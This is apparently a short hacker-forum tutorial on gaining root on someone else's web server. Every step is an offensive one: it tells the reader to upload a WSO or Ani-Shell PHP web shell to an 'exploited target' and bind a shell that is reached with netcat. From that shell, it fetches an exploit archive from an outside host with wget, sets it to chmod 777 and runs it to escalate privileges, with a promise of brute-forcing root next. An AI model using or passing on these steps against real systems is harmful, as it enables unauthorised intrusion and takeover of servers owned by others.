Requirements

The following are the materials you’ll need before starting:
1. A PHP Shell (Preferably WSO or Ani-Shell which can be downloaded from Sourceforge or Google)
2. Netcat
3. A port forwarded router (To be able to back-connect to your shell hosted on your target)
4. An exploited target (or a server)
5. An exploit (Public or Private)

Steps

First step

You need to be able to gain remote control of your server/target. To get started, make sure you have a PHP shell uploaded on the your target’s server. A screenshot of a shelled target can look something like below:
Image
Obtain the IP address of your target as you would need it to perform back-connection. Once you have the IP address noted down, navigate your way to the “Network” section of the shell.

Second step

While on your shell in the “Network” center, we’ll be using the “Bind Shell” method to establish a connection between our computer and your target.
A screenshot below is an example of how it looks like:
Image
Enter your opened port number in the input port box.

Third step

Now let’s move on to our computer and start setting up our connection.
Download Netcat and navigate to the extracted folder using Command Prompt.
A demonstration of how it looks like below:
Image
Enter the command in this format:
nc -v <Target's IP Address> <Opened port number>

Fourth step

Go back to your shell and click the connect button located beside the port input box.
Once that’s done, execute the command in your command prompt to establish a connection..
If successful, you should be able to execute Unix commands.
Some of the unix commands are below:
1. ls (lists files in current directory)
2. uname -a (displays the kernel version of the server)
3. whoami (displays the current user)
4. wget (remotely downloads file specified by a URL)
You can find more by going on here: http://fosswire.com

Fifth step

Now, we’ll be using our command prompt to download the exploit remotely using “wget”.
Your command should look something like this:
wget http://site.com/exploit.zip

Sixth step

After download the exploit zip file, use the following command to extract it.
unzip exploit.zip

Once that’s done, we’ll be giving full permissions to the file by chmodding to 777
chmod 777 exploit

Last step

If everything done above is succesful, you should be able to run the exploit like so:
./exploit

If successful, you should be able to be root.
To check, just enter “whoami” or “id”

Video Example

That’s just the basics of how to root. Sooner or later, I’ll be able to teach you guys how to perform more actions when owning a box and that includes compiling, bypassing and enumerating.
Also, will be showing you a tutorial on how to root via bruteforcing the root user credentials.

Anyways, hope you learned from this tutorial.
I’m ZeroFreak, also known as ZentrixPlus from http://zentrixplus.net
Thanks for viewing this article and have a nice day.